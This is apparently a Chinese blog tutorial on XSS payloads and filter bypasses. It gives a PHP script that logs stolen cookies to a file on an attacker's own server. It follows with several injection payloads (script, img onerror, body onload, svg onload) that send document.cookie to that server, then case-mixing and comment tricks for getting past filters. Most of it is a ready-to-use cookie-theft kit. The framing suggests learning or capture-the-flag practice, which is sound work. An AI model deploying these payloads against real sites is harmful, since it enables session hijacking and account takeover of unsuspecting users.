XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

php 复制代码
//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

php 复制代码
<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

php 复制代码
使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
相关推荐
Immortal__y7 小时前
网络安全初级--搭建
安全·web安全
hans汉斯14 小时前
【计算机科学与应用】面向APT攻击调查的溯源图冗余结构压缩
网络·算法·安全·web安全·yolo·目标检测·图搜索算法
浮江雾17 小时前
SSRF9 各种限制绕过之域名限制绕过
网络·tcp/ip·安全·web安全·ssrf·绕过限制
cat&seven17 小时前
CISSP通过回顾
网络安全·cissp
小小工匠18 小时前
Web安全 - 基于 SM2/SM4 的前后端国产加解密方案详解
web安全·sm2/sm4·前后端国产加解密
mooyuan天天19 小时前
DVWA靶场通关笔记-XSS DOM(Medium级别)
xss·dom型xss·xss漏洞·dvwa靶场
hjh1982919 小时前
渗透前四天总结
网络·网络安全
ZLJ05072421 小时前
网络安全的基本练习
安全·网络安全
桑晒.21 小时前
Webshell连接工具原理
安全·web安全·网络安全
mooyuan天天1 天前
DVWA靶场通关笔记-弱会话IDs(Weak Session IDs High级别)
web安全·dvwa靶场·弱会话id